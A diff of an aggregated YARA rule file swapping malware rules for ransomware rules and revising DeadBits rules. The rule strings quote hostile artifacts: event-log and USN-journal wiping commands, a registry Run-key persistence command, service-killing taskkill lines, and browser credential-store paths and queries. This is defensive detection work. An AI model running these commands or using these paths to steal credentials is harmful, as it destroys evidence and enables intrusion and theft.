-		md5_1 = "d488e4b61c233293bec2ee09553d3a2f"
-		md5_2 = "b95911a69e49544f9ecc427478eb952f"
-		md5_3 = "063b58879c8197b06d619c3be90506ec"
-		md5_4 = "7690e414e130acf7c962774c05283142"
 
 	strings:
-		$s1 = "s:\\workspace\\ccleaner\\branches\\v5.33" fullword ascii wide
+		$s1 = "MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+YLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/+mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgq+CXsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu6zfhzuts7KafP5UA8/0Hmf5K3/F9Mf9SE68EZjK+cIiFlKeWndP0XfRCYXI9AJYCeaOu7CXF6U0AVNnNjvLeOn42LHFUK4o6JwIDAQAB" fullword wide
 
 	condition:
 		$s1
 }
-rule BINARYALERT_Malware_Windows_Moonlightmaze_Loki
+rule BINARYALERT_Ransomware_Windows_Cerber_Evasion
 {
 	meta:
-		description = "Rule to detect Moonlight Maze Loki samples by custom attacker-authored strings"
-		author = "Kaspersky Lab"
-		id = "06eeb6a4-540f-51eb-86f9-4ab49543f645"
+		description = "Cerber Ransomware: Evades detection by machine learning applications"
+		author = "@fusionrace"
+		id = "6e2f44a9-bc0f-5071-9d80-ddfb778cfe5d"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_loki.yara#L1-L27"
+		reference = "http://www.darkreading.com/vulnerabilities---threats/cerber-ransomware-now-evades-machine-learning/d/d-id/1328506"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_cerber_evasion.yara#L1-L15"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "9a403695ded6ff3626820ba0d4abde7ccd6f3fa6bfd8aa4ceaf0cc009d34c97f"
+		hash = "bc62b557d48f3501c383f25d014f22df"
+		logic_hash = "43b3b8be5a23b57f6c671abd8491cdc51af1cf3a3fe8a7be308150697cdb92ea"
 		score = 75
 		quality = 80
 		tags = ""
-		md5_1 = "14cce7e641d308c3a177a8abb5457019"
-		md5_2 = "a3164d2bbc45fb1eef5fde7eb8b245ea"
-		md5_3 = "dabee9a7ea0ddaf900ef1e3e166ffe8a"
-		md5_4 = "1980958afffb6a9d5a6c73fc1e2795c2"
-		md5_5 = "e59f92aadb6505f29a9f368ab803082e"
 
 	strings:
-		$a1 = "Write file Ok..." ascii wide
-		$a2 = "ERROR: Can not open socket...." ascii wide
-		$a3 = "Error in parametrs:" ascii wide
-		$a4 = "Usage: @<get/put> <IP> <PORT> <file>" ascii wide
-		$a5 = "ERROR: Not connect..." ascii wide
-		$a6 = "Connect successful...." ascii wide
-		$a7 = "clnt <%d> rqstd n ll kll" ascii wide
-		$a8 = "clnt <%d> rqstd swap" ascii wide
-		$a9 = "cld nt sgnl prcs grp" ascii wide
-		$a10 = "cld nt sgnl prnt" ascii wide
-		$a11 = "ork error" ascii fullword
+		$s1 = "38oDr5.vbs" fullword ascii wide
+		$s2 = "8ivq.dll" fullword ascii wide
+		$s3 = "jmsctls_progress32" fullword ascii wide
 
 	condition:
-		2 of ( $a* )
+		all of them
 }
-rule BINARYALERT_Malware_Windows_Moonlightmaze_Wipe : FILE
+rule BINARYALERT_Ransomware_Windows_Hydracrypt
 {
 	meta:
-		description = "Rule to detect log cleaner based on wipe.c"
-		author = "Kaspersky Lab"
-		id = "35060c3d-b805-54a6-a241-eb6e99168fa8"
+		description = "HydraCrypt encrypts a victim’s files and appends the filenames with the extension “hydracrypt_ID_*"
+		author = "@fusionrace"
+		id = "9ebf205e-b6a9-55a3-b0c3-9b088790dc9a"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "http://www.afn.org/~afn28925/wipe.c"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_wipe.yara#L3-L18"
+		reference = "https://securingtomorrow.mcafee.com/mcafee-labs/hydracrypt-variant-of-ransomware-distributed-by-angler-exploit-kit/"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_hydracrypt.yara#L1-L16"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "e69efc504934551c6a77b525d5343241"
-		logic_hash = "0241d1ca9f5a4d066f7ed2e80bc18ebae3723c6a2364422e31909e8f0e576675"
+		hash = "08b304d01220f9de63244b4666621bba"
+		logic_hash = "3ecb3e6c269f4145e60b0e7bb0e896120ceb2db2123f847bf4bdf5d4490467d5"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$a1 = "ERROR: Unlinking tmp WTMP file."
-		$a2 = "USAGE: wipe [ u|w|l|a ] ...options..."
-		$a3 = "Erase acct entries on tty :   wipe a [username] [tty]"
-		$a4 = "Alter lastlog entry       :   wipe l [username] [tty] [time] [host]"
+		$u0 = "oTraining" fullword ascii wide
+		$u1 = "Stop Training" fullword ascii wide
+		$u2 = "Play \"sound.wav\"" fullword ascii wide
+		$u3 = "&Start Recording" fullword ascii wide
+		$u4 = "7About record" fullword ascii wide
 
 	condition:
-		( uint32( 0 ) == 0x464c457f ) and ( 2 of them )
+		all of them
 }
-rule BINARYALERT_Malware_Windows_Moonlightmaze_IRIX_Exploit_GEN : FILE
+rule BINARYALERT_Ransomware_Windows_Lazarus_Wannacry : FILE
 {
 	meta:
-		description = "Rule to detect Irix exploits from David Hedley used by Moonlight Maze hackers"
-		author = "Kaspersky Lab"
-		id = "4f9ab7b0-4fb9-5311-ae23-01d0a9e2e104"
+		description = "Rule based on shared code between Feb 2017 Wannacry sample and Lazarus backdoor from Feb 2015 discovered by Neel Mehta"
+		author = "Costin G. Raiu, Kaspersky Lab"
+		id = "6335bd03-0625-5856-891c-9a5decd7e00f"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://www.exploit-db.com/exploits/19274/"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_IRIX_exploit_GEN.yara#L3-L20"
+		reference = "https://twitter.com/neelmehta/status/864164081116225536"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_lazarus_wannacry.yara#L3-L32"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "9d55d780c84f2aa4e64c19842b2055ef4bf7c8844ebe622c3942445b06ab8344"
+		logic_hash = "dddff5f74bf3f11baf1d3853d6cb5e5b1e0c5e75445c421d4d5145f7a496fc4b"
 		score = 75
 		quality = 80
 		tags = "FILE"
-		md5_1 = "008ea82f31f585622353bd47fa1d84be"
-		md5_2 = "a26bad2b79075f454c83203fa00ed50c"
-		md5_3 = "f67fc6e90f05ba13f207c7fdaa8c2cab"
-		md5_4 = "5937db3896cdd8b0beb3df44e509e136"
-		md5_5 = "f4ed5170dcea7e5ba62537d84392b280"
+		md5_1 = "9c7c7149387a1c79679a87dd1ba755bc"
+		md5_2 = "ac21c8ad899727137c4b94458d7aa8d8"
 
 	strings:
-		$a1 = "stack = 0x%x, targ_addr = 0x%x"
-		$a2 = "execl failed"
+		$a1 = {
+        51 53 55 8B 6C 24 10 56 57 6A 20 8B 45 00 8D 75
+        04 24 01 0C 01 46 89 45 00 C6 46 FF 03 C6 06 01
+        46 56 E8
+        }
+		$a2 = {
+        03 00 04 00 05 00 06 00 08 00 09 00 0A 00 0D 00
+        10 00 11 00 12 00 13 00 14 00 15 00 16 00 2F 00
+        30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00
+        38 00 39 00 3C 00 3D 00 3E 00 3F 00 40 00 41 00
+        44 00 45 00 46 00 62 00 63 00 64 00 66 00 67 00
+        68 00 69 00 6A 00 6B 00 84 00 87 00 88 00 96 00
+        FF 00 01 C0 02 C0 03 C0 04 C0 05 C0 06 C0 07 C0
+        08 C0 09 C0 0A C0 0B C0 0C C0 0D C0 0E C0 0F C0
+        10 C0 11 C0 12 C0 13 C0 14 C0 23 C0 24 C0 27 C0
+        2B C0 2C C0 FF FE
+        }
 
 	condition:
-		( uint32( 0 ) == 0x464c457f ) and ( all of them )
+		(( uint16( 0 ) == 0x5A4D ) ) and all of them
 }
-rule BINARYALERT_Malware_Windows_Winnti_Loadperf_Dll_Loader
+rule BINARYALERT_Ransomware_Windows_Cryptolocker
 {
 	meta:
-		description = "Winnti APT group; gzwrite64 imported from loadoerf.ini"
-		author = "@mimeframe"
-		id = "41444dd5-41b9-550c-9124-bc7f41326baa"
+		description = "The CryptoLocker malware propagated via infected email attachments, and via an existing botnet; when activated, the malware encrypts files stored on local and mounted network drives"
+		author = "@fusionrace"
+		id = "be205f4b-d078-5437-bacc-203c816db2fa"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_winnti_loadperf_dll_loader.yara#L1-L13"
+		reference = "https://www.secureworks.com/research/cryptolocker-ransomware"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_cryptolocker.yara#L1-L21"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "879ce99e253e598a3c156258a9e81457"
-		logic_hash = "b1035174edfff2e142026f3482fc53407af59f5215a6030c0d2a85501152c3db"
+		hash = "012d9088558072bc3103ab5da39ddd54"
+		logic_hash = "317cbc01b4c329befeb5b25478f7827298a26d21b872ae232c519febd9c547fc"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$s1 = "loadoerf.ini" fullword ascii wide
-		$s2 = "gzwrite64" fullword ascii wide
+		$u0 = "Paysafecard is an electronic payment method for predominantly online shopping" fullword ascii wide
+		$u1 = "bb to select the method of payment and the currency." fullword ascii wide
+		$u2 = "Where can I purchase a MoneyPak?" fullword ascii wide
+		$u3 = "Ukash is electronic cash and e-commerce brand." fullword ascii wide
+		$u4 = "You have to send below specified amount to Bitcoin address" fullword ascii wide
+		$u5 = "cashU is a prepaid online" fullword ascii wide
+		$u6 = "Your important files \\b encryption" fullword ascii wide
+		$u7 = "Encryption was produced using a \\b unique\\b0  public key" fullword ascii wide
+		$u8 = "then be used to pay online, or loaded on to a prepaid card or eWallet." fullword ascii wide
+		$u9 = "Arabic online gamers and e-commerce buyers." fullword ascii wide
 
 	condition:
-		all of ( $s* )
+		2 of them
 }
-rule BINARYALERT_Malware_Windows_Moonlightmaze_Cle_Tool
+rule BINARYALERT_Ransomware_Windows_Hddcryptora
 {
 	meta:
-		description = "Rule to detect Moonlight Maze 'cle' log cleaning tool"
-		author = "Kaspersky Lab"
-		id = "d875a3cf-cad1-509f-bb9f-27f0a3a9b79d"
+		description = "The HDDCryptor ransomware encrypts local harddisks as well as resources in network shares via Server Message Block (SMB)"
+		author = "@fusionrace"
+		id = "56d7f1f5-811d-58c9-9e1d-d2f48c01e167"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_cle_tool.yara#L1-L17"
+		reference = "http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_HDDCryptorA.yara#L1-L23"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "647d7b711f7b4434145ea30d0ef207b0"
-		logic_hash = "8f75df1240b9e5e905492106265a7e1342db4140d715529933af4ba5c8ec6331"
+		hash = "498bdcfb93d13fecaf92e96f77063abf"
+		logic_hash = "24c113be31c3df7b544a5789bf055f77471d450c07f0a6729a715e2a82b4d1f0"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = ""
 
 	strings:
-		$a1 = "./a filename template_file" ascii wide
-		$a2 = "May be %s is empty?" ascii wide
-		$a3 = "template string = |%s|" ascii wide
-		$a4 = "No blocks !!!"
-		$a5 = "No data in this block !!!!!!" ascii wide
-		$a6 = "No good line"
+		$u1 = "You are Hacked" fullword ascii wide
+		$u2 = "Your H.D.D Encrypted , Contact Us For Decryption Key" nocase ascii wide
+		$u3 = "start hard drive encryption..." ascii wide
+		$u4 = "Your hard drive is securely encrypted" ascii wide
+		$g1 = "Wipe All Passwords?" ascii wide
+		$g2 = "SYSTEM\\CurrentControlSet\\Services\\dcrypt\\config" ascii wide
+		$g3 = "DiskCryptor" ascii wide
+		$g4 = "dcinst.exe" fullword ascii wide
+		$g5 = "dcrypt.exe" fullword ascii wide
+		$g6 = "you can only use AES to encrypt the boot partition!" ascii wide
 
 	condition:
-		3 of ( $a* )
+		2 of ( $u* ) or 4 of ( $g* )
 }
-rule BINARYALERT_Malware_Windows_Moonlightmaze_De_Tool
+rule BINARYALERT_Ransomware_Windows_Powerware_Locky
 {
 	meta:
-		description = "Rule to detect Moonlight Maze 'de' and 'deg' tunnel tool"
-		author = "Kaspersky Lab"
-		id = "8b943c21-eac7-521d-8dc6-90d611aa4d92"
+		description = "PowerWare Ransomware"
+		author = "@fusionrace"
+		id = "8a1a56af-7a9d-54ed-90b9-daf33735ee1e"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_de_tool.yara#L1-L16"
+		reference = "https://researchcenter.paloaltonetworks.com/2016/07/unit42-powerware-ransomware-spoofing-locky-malware-family/"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_powerware_locky.yara#L1-L17"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "836331856200fde9792d3bf97d3a18b7f4497ceaae1cfceb0de7c2949e315b9c"
+		hash = "3433a4da9d8794709630eb06afd2b8c1"
+		logic_hash = "64de34755f706a9fd4c876c473eed4f8922a4450c7ef135b0ab5e49c67363baf"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = ""
-		md5_1 = "4bc7ed168fb78f0dc688ee2be20c9703"
-		md5_2 = "8b56e8552a74133da4bc5939b5f74243"
 
 	strings:
-		$a1 = "Vnuk: %d" ascii fullword
-		$a2 = "Syn: %d" ascii fullword
-		$a3 = {25 73 0A 25 73 0A 25 73 0A 25 73 0A}
+		$s0 = "ScriptRunner.dll" fullword ascii wide
+		$s1 = "ScriptRunner.pdb" fullword ascii wide
+		$s2 = "fixed.ps1" fullword ascii wide
 
 	condition:
-		2 of ( $a* )
+		all of them
 }
-rule BINARYALERT_Malware_Windows_Moonlightmaze_Custom_Sniffer
+rule BINARYALERT_Ransomware_Windows_Petya_Variant_3
 {
 	meta:
-		description = "Rule to detect Moonlight Maze sniffer tools"
-		author = "Kaspersky Lab"
-		id = "a9f005e0-8d73-58ff-b010-d3ce08ffdb64"
+		description = "Petya Ransomware new variant June 2017 using ETERNALBLUE"
+		author = "@fusionrace"
+		id = "cbf06e62-abe8-54af-b4f4-624ba9233e4b"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_custom_sniffer.yara#L1-L20"
+		reference = "https://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_petya_variant_3.yara#L1-L13"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "466be027f567fe0afc88c82d94e4e0171b4b7d8f38d27a4c4a18cec4ca2b8b2f"
+		hash = "71b6a493388e7d0b40c83ce903bc6b04"
+		logic_hash = "4f21b394eb2dd0ebf416b018f438934fdc89cb896701d95b593477fc19abfe48"
 		score = 75
 		quality = 80
 		tags = ""
-		md5_1 = "7b86f40e861705d59f5206c482e1f2a5"
-		md5_2 = "927426b558888ad680829bd34b0ad0e7"
 
 	strings:
-		$a1 = "/var/tmp/gogo" fullword
-		$a2 = "myfilename= |%s|" fullword
-		$a3 = "mypid,mygid=" fullword
-		$a4 = "mypid=|%d| mygid=|%d|" fullword
-		$a5 = "/var/tmp/task" fullword
-		$a6 = "mydevname= |%s|" fullword
+		$s1 = "wevtutil cl Setup & wevtutil cl System" fullword wide
+		$s2 = "fsutil usn deletejournal /D %c:" fullword wide
 
 	condition:
-		any of ( $a* )
+		any of them
 }
-rule BINARYALERT_Malware_Windows_Pony_Stealer
+rule BINARYALERT_Ransomware_Windows_Wannacry
 {
 	meta:
-		description = "Pony stealer malware"
-		author = "@mimeframe"
-		id = "77af81cb-36c7-56a7-bd89-14d79628e5c4"
+		description = "wannacry ransomware for windows"
+		author = "@fusionrace"
+		id = "0269b6f4-a47d-5683-aaaa-2141ca7f04dc"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://www.knowbe4.com/pony-stealer"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_pony_stealer.yara#L1-L21"
+		reference = "https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_wannacry.yara#L1-L23"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "5e52ce394c3be2a685dbb8f435e2f64f"
-		logic_hash = "4d4e28e0d4d97412a9129a4abfadc130a464a2ababf46ca8f366a2a30b262261"
+		hash = "4fef5e34143e646dbf9907c4374276f5"
+		logic_hash = "c01f460c0f5e39cde5f553c966553fe693e5203cb020b8f571eac6fc193fa91b"
 		score = 75
 		quality = 50
 		tags = ""
 
 	strings:
-		$a1 = "signons.sqlite" nocase wide ascii
-		$a2 = "signons.txt" nocase wide ascii
-		$a3 = "signons2.txt" nocase wide ascii
-		$a4 = "signons3.txt" nocase wide ascii
-		$a5 = "WininetCacheCredentials" nocase wide ascii
-		$a6 = "moz_logins" nocase wide ascii
-		$a7 = "encryptedPassword" nocase wide ascii
-		$a8 = "FlashFXP" nocase wide ascii
-		$a9 = "BulletProof" nocase wide ascii
-		$a10 = "CuteFTP" nocase wide ascii
+		$a1 = "msg/m_chinese" wide ascii
+		$a2 = ".wnry" wide ascii
+		$a3 = "attrib +h" wide ascii
+		$b1 = "WNcry@2ol7" wide ascii
+		$b2 = "iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com" wide ascii
+		$b3 = "115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn" wide ascii
+		$b4 = "12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw" wide ascii
+		$b5 = "13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94" wide ascii
 
 	condition:
-		all of ( $a* )
+		all of ( $a* ) or any of ( $b* )
 }
 /*
  * YARA Rule Set
  * Repository Name: DeadBits
  * Repository: https://github.com/deadbits/yara-rules/
- * Retrieval Date: 2025-06-08
+ * Retrieval Date: 2025-06-15
  * Git Commit: d002f7ecee23e09142a3ac3e79c84f71dda3f001
  * Number of Rules: 19
  * Skipped: 0 (age), 4 (quality), 0 (score), 0 (importance)
@@ -66481,104 +67041,6 @@ rule BINARYALERT_Malware_Windows_Pony_Stealer
  *
  * NO LICENSE SET
  */
-rule DEADBITS_Silenttrinity : FILE
-{
-	meta:
-		description = "No description has been set in the source file - DeadBits"
-		author = "Adam Swanda"
-		id = "40f9174c-e9a5-5453-b5fa-6c01c46daffa"
-		date = "2019-07-19"
-		modified = "2019-07-19"
-		reference = "https://countercept.com/blog/hunting-for-silenttrinity/"
-		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/SilentTrinity_Payload.yara#L1-L55"
-		license_url = "N/A"
-		logic_hash = "7fd1775aadfccfdf141c0721f557e6c54b058ac17a59a8e4561dd62ab4a1eff3"
-		score = 75
-		quality = 78
-		tags = "FILE"
-		Description = "Attempts to detect the SilentTrinity malware family"
-		Author = "Adam M. Swanda"
-
-	strings:
-		$pdb01 = "SILENTTRINITY.pdb" ascii
-		$str01 = "Found {0} in zip" ascii fullword
-		$str02 = "{0} not in zip file" ascii fullword
-		$str03 = "Invalid HMAC: {0}" ascii fullword
-		$str04 = "Attempting HTTP GET to {0}" ascii fullword
-		$str05 = "Downloaded {0} bytes" ascii fullword
-		$str06 = "Error downloading {0}: {1}" ascii fullword
-		$str07 = "Attempting HTTP POST to {0}" ascii fullword
-		$str08 = "POST" ascii fullword
-		$str09 = "application/octet-stream" ascii fullword
-		$str10 = "Error sending job results to {0}: {1}" ascii fullword
-		$str11 = ".dll" ascii fullword
-		$str12 = "Trying to resolve assemblies by staging zip" ascii fullword
-		$str13 = "'{0}' loaded" ascii fullword
-		$str14 = "Usage: SILENTTRINITY.exe <URL> [<STAGE_URL>]" ascii fullword
-		$str15 = "IronPython.dll" ascii fullword
-		$str16 = "IronPythonDLL" ascii fullword
-		$str17 = "DEBUG" ascii fullword
-		$str18 = "Main.py" ascii fullword
-		$str19 = "Execute" ascii fullword
-		$str20 = "SILENTTRINITY.Properties.Resources" ascii fullword
-		$str21 = ".zip" ascii fullword
-		$a00 = "HttpGet" ascii fullword
-		$a01 = "System.Net" ascii fullword
-		$a02 = "Target" ascii fullword
-		$a03 = "WebClient" ascii fullword
-		$a04 = "get_Current" ascii fullword
-		$a05 = "Endpoint" ascii fullword
-		$a06 = "AesDecrypt" ascii fullword
-		$a07 = "AesEncrypt" ascii fullword
-		$a08 = "cert" ascii fullword
-		$a09 = "WebRequest" ascii fullword
-		$a10 = "HttpPost" ascii fullword
-
-	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 8 of ( $str* ) or ( all of ( $a* ) and $pdb01 ) or $pdb01 ) )
-}
-rule DEADBITS_Redghost_Linux : POSTEXPLOITATION LINUXMALWARE
-{
-	meta:
-		description = "No description has been set in the source file - DeadBits"
-		author = "Adam Swanda"
-		id = "f598e115-f821-5932-aa14-5254bf28092c"
-		date = "2019-08-07"
-		modified = "2019-08-08"
-		reference = "https://github.com/d4rk007/RedGhost/"
-		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/RedGhost_Linux.yara#L1-L45"
-		license_url = "N/A"
-		logic_hash = "0b12a0eda0a3b65c3da787770afb010eb5cd36426d41c04aca862ae1b01ab770"
-		score = 75
-		quality = 80
-		tags = "POSTEXPLOITATION, LINUXMALWARE"
-		Author = "Adam M. Swanda"
-
-	strings:
-		$name = "[ R E D G H O S T - P O S T  E X P L O I T - T O O L]" ascii
-		$feature0 = "Payloads" ascii
-		$feature1 = "SudoInject" ascii
-		$feature2 = "lsInject" ascii
-		$feature3 = "Crontab" ascii
-		$feature4 = "GetRoot" ascii
-		$feature5 = "Clearlogs" ascii
-		$feature6 = "MassinfoGrab" ascii
-		$feature7 = "CheckVM" ascii
-		$feature8 = "MemoryExec" ascii
-		$feature9 = "BanIP" ascii
-		$func0 = "checkVM(){" ascii
-		$func1 = "memoryexec(){" ascii
-		$func2 = "banip(){" ascii
-		$func3 = "linprivesc(){" ascii
-		$func4 = "dirty(){" ascii
-		$func5 = "Ocr(){" ascii
-		$func6 = "clearlog(){" ascii
-		$func7 = "conmethods(){" ascii
-		$func8 = "add2sys(){" ascii
-
-	condition:
-		( uint16be( 0x0 ) == 0x2321 and for any i in ( 0 .. 64 ) : ( uint16be( i ) == 0x2f62 and uint8( i + 2 ) == 0x68 ) ) and ( $name or 5 of them )
-}
 rule DEADBITS_KPOT_V2 : WINMALWARE INFOSTEALER FILE
 {
 	meta:
@@ -66616,86 +67078,185 @@ rule DEADBITS_KPOT_V2 : WINMALWARE INFOSTEALER FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and all of ( $str* ) and all of ( $conf_re* ) and all of ( $conf0* )
 }
-rule DEADBITS_Jsworm : MALWARE FILE
+rule DEADBITS_APT34_PICKPOCKET : APT APT34 INFOSTEALER WINMALWARE FILE
+{
+	meta:
+		description = "Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018"
+		author = "Adam Swanda"
+		id = "71db5c74-4964-5c5e-a830-242bfd0a2158"
+		date = "2019-07-22"
+		modified = "2019-07-22"
+		reference = "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html"
+		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/APT34_PICKPOCKET.yara#L1-L30"
+		license_url = "N/A"
+		logic_hash = "7063cff3eb42c4468e01c9b214161cd306f7126f66650d99d43168730d1dc83a"
+		score = 75
+		quality = 80
+		tags = "APT, APT34, INFOSTEALER, WINMALWARE, FILE"
+
+	strings:
+		$s1 = "SELECT * FROM moz_logins;" ascii fullword
+		$s2 = "\\nss3.dll" ascii fullword
+		$s3 = "SELECT * FROM logins;" ascii fullword
+		$s4 = "| %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');" ascii fullword
+		$s5 = "\\Login Data" ascii fullword
+		$s6 = "%s\\Mozilla\\Firefox\\profiles.ini" ascii fullword
+		$s7 = "Login Data" ascii fullword
+		$s8 = "encryptedUsernamencryptedPasswor" ascii fullword
+		$s10 = "%s\\Mozilla\\Firefox\\%s" ascii fullword
+		$s11 = "encryptedUsername" ascii fullword
+		$s12 = "2013-12-06 14:53:30 27392118af4c38c5203a04b8013e1afdb1cebd0d" ascii fullword
+		$s13 = "27392118af4c38c5203a04b8013e1afdb1cebd0d" ascii
+		$s15 = "= 'table' AND name!='sqlite_sequence'   AND coalesce(rootpage,1)>0" ascii fullword
+		$s18 = "[*] FireFox :" fullword wide
+		$s19 = "[*] Chrome :" fullword wide
+		$s20 = "username_value" ascii fullword
+
+	condition:
+		uint16( 0 ) == 0x5a4d and ( 8 of them or all of them )
+}
+rule DEADBITS_Avemaria_Warzone : AVEMARIA WARZONE WINMALWARE INFOSTEALER FILE
 {
 	meta:
 		description = "No description has been set in the source file - DeadBits"
 		author = "Adam Swanda"
-		id = "6d452d04-b475-5241-890c-68119a7a8691"
-		date = "2019-09-06"
-		modified = "2019-09-06"
-		reference = "https://github.com/deadbits/yara-rules/"
-		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/JSWorm.yara#L1-L38"
+		id = "1e03927b-d59c-5e1f-bdee-e44dfb172fad"
+		date = "2019-07-18"
+		modified = "2019-08-08"
+		reference = "https://github.com/deadbits/yara-rules"
+		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/avemaria_warzone.yara#L1-L32"
 		license_url = "N/A"
-		logic_hash = "99074e25ec15c5b25fa41bef19203f5ddc227acd51fadca1e2c3ece538b3da01"
+		logic_hash = "1fe55fc8ea80616b11757193c2c74b9cf577ab661ddca4c6c64cfad63a300614"
 		score = 75
-		quality = 78
-		tags = "MALWARE, FILE"
+		quality = 80
+		tags = "AVEMARIA, WARZONE, WINMALWARE, INFOSTEALER, FILE"
+		Author = "Adam M. Swanda"
 
 	strings:
-		$name00 = "JSWORM" nocase
-		$str00 = "DECRYPT.txt" nocase
-		$str02 = "cmd.exe"
-		$str03 = "/c reg add HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v \"zapiska\" /d \"C:\\ProgramData\\"
-		$str04 = /\/c taskkill.exe taskkill \/f \/im (store|sqlserver|dns|sqlwriter)\.exe/
-		$str05 = "/c start C:\\ProgramData\\"
